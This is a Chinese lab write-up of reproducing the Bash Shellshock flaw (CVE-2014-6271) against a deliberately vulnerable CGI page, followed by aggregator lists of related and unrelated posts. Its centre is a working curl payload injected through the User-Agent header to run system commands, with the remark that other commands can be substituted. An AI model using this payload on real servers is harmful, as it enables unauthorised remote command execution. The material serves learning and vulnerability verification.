服务启动后,通过浏览器或命令行访问以下两个页面,确认服务已正常运行:

存在漏洞的页面(基于 bash4.3):http://your-ip:8080/victim.cgi

修复后的页面(基于最新版 bash):http://your-ip:8080/safe.cgi

执行curl -H "User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id" http://192.168.75.132:8080/victim.cgi命令

发送 HTTP 请求,在User-Agent头中注入 Payload

Payload 说明:

() { foo; }; 是为了绕过 bash 的函数定义检查,后面的echo Content-Type: text/plain; echo; /usr/bin/id会被漏洞 bash 执行,其中:

echo Content-Type: text/plain; echo; 用于正确输出 HTTP 响应头

/usr/bin/id 是要执行的系统命令(可替换为其他命令,如/bin/ls等)

观察结果

访问victim.cgi时,命令会被成功执行,返回id命令的结果(如用户 UID、GID 等信息),说明漏洞存在。

访问safe.cgi时,相同的 Payload 不会被执行,只会返回正常页面内容,说明修复有效

这里返回id命令,漏洞利用成功!

CVE-2014-6271 Bash破壳漏洞Shellshock (复现)的更多相关文章

  1. Bash Shellshock(CVE-2014-6271)破壳漏洞测试

    0x01 漏洞原理 Bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以"(){"开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行 ...

  2. 破壳漏洞利用payload—shellshock in the wild

    FireEye关于破壳漏洞(shellshock)在现实中的利用有一篇文章: shellshock in the wild 原文较长,进行了对CGI利用的详细分析,笔者比较感兴趣的是Shellshoc ...

  3. CVE-2014-6271 Shellshock 破壳漏洞 复现

    补坑. 什么是shellshock ShellShock是一个BashShell漏洞(据说不仅仅是Bash,其他shell也可能有这个漏洞). 一般情况来说,系统里面的Shell是有严格的权限控制的, ...

  4. Shellshock 破壳漏洞 Writeup

    破壳漏洞 CVE编号:CVE-2014-6271 题目URL:http://www.whalwl.site:8029/ 提示:flag在服务器根目录 ShellShock (CVE-2014-6271 ...

  5. linux_曝出重大bash安全漏洞及修复方法

    日前Linux官方内置Bash中新发现一个非常严重安全漏洞(漏洞参考https://access.redhat.com/security/cve/CVE-2014-6271  ),黑客可以利用该Bas ...

  6. JBOSS中间件漏洞总汇复现

    JBOSS中间件漏洞总汇复现 JBoss JMXInvokerServlet 反序列化漏洞 漏洞复现 直接使用docker搭建的漏洞环境. 环境搭建完成后,直接使用工具检测即可:工具下载地址https ...

  7. Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程

    v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VM ...

  8. 高速修复汉澳sinox命令解释程序bash shell漏洞

    bash是linux默认命令行管理程序shell.汉澳 sinox也安装有,尽管sinox并没有默认使用bash.可是用户一旦使用就会可能被通过漏洞入侵,所以必须高速修复.尽管sinox使用freeb ...

  9. phpStudy后门漏洞利用复现

    phpStudy后门漏洞利用复现 一.漏洞描述 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache.PHP.MySQL.phpMyAdmin.ZendOptimiz ...

  10. ThinkCMF X1.6.0-X2.2.3框架任意内容包含漏洞分析复现

    ThinkCMF X1.6.0-X2.2.3框架任意内容包含漏洞分析复现 一.ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理系统框架,底层采用ThinkPHP3. ...

随机推荐

  1. LR梯度下降法MSE演练

    同步进行一波网上代码搬砖, 先来个入门的线性回归模型训练, 基于梯度下降法来, 优化用 MSE 来做. 理论部分就不讲了, 网上一大堆, 我自己也是理解好多年了, 什么 偏导数, 梯度(多远函数一阶偏 ...

  2. linux下动态壁纸(ubuntu20.04测试)

    linux下实现动态壁纸(ubuntu20.04测试) github地址: https://github.com/dependon/fantascene-dynamic-wallpaper bilib ...

  3. 做自己的第一个网站(Bootscrapt、odoo14作、JQuery)

    今天发布自己的第一个网站,网站内容是关于自己家乡的美景,效果图如下:网站地址是:http://hxmelon.com/ 二.技术篇 1.在这里网站用的是Bootscrapt框架作为网站开发模板.前端语 ...

  4. MyBatis-Plus实现部分字段存取加解密

    前言 网上教程大致有两种 1.基于MyBatis-Plus自定义类型处理器(TypeHandler)的方法 2.基于MyBatis的方法(拦截器) 这里使用的第二种,为了保护隐私,这里把package ...

  5. 刚刚,Cursor 1.0炸裂发布!4大亮点实战

    炸裂,炸裂,炸裂!时隔两年半,Cursor 终于正式发布了 1.0 版本. 作为一名 Cursor 舔狗用户,我第一时间体验了这次的大更新,主要包括用于代码审查的 BugBot.记忆功能的首次亮相.一 ...

  6. 雷池 7.x 主从节点分钟级自动同步 + 手动切换实战教程

    雷池7.x版本新增配置同步功能,可以设置主节点和从节点,可以自动每分钟将主节点的配置同步到从节点,在主节点异常情况下,使用者手动切换流量后,实现从节点马上承接业务流量. 准备环境 ● 检查主从节点机器 ...

  7. kubernetes集群实用操作

    一.查看日志 说明:输出Pod中一个容器的日志信息,如果pod只包含一个容器则可以省略容器名. kubectl logs [-f] [-p] POD [-c CONTAINER] 举例说明 # 返回包 ...

  8. Coze工作流实战:一键生成像素风格视频

    前言 最近像素画风的视频非常火,一个视频浏览量超过10w+的也有很多. 那么这个是怎么实现的? 其实,通过AI工作流可以比较简单地实现这样的短视频. 今天给大家分享一下,我是如何搭建工作流实现的. 欢 ...

  9. centos上redis的安装

    官网教程 redis安装官网 https://redis.io/docs/latest/operate/oss_and_stack/install/install-redis/ 可以右下方看到安装到各 ...

  10. [Ynoi2014] 人人本着正义之名

    题传 考虑 3/4/5/6 操作,发现本质上是对某段颜色相同的段向左/右拓展. 考虑 1/2 为区间推平操作,其它操作只会减少颜色段,因此总颜色段为 \(O(n+m)\) 的,直接平衡树维护即可. 然 ...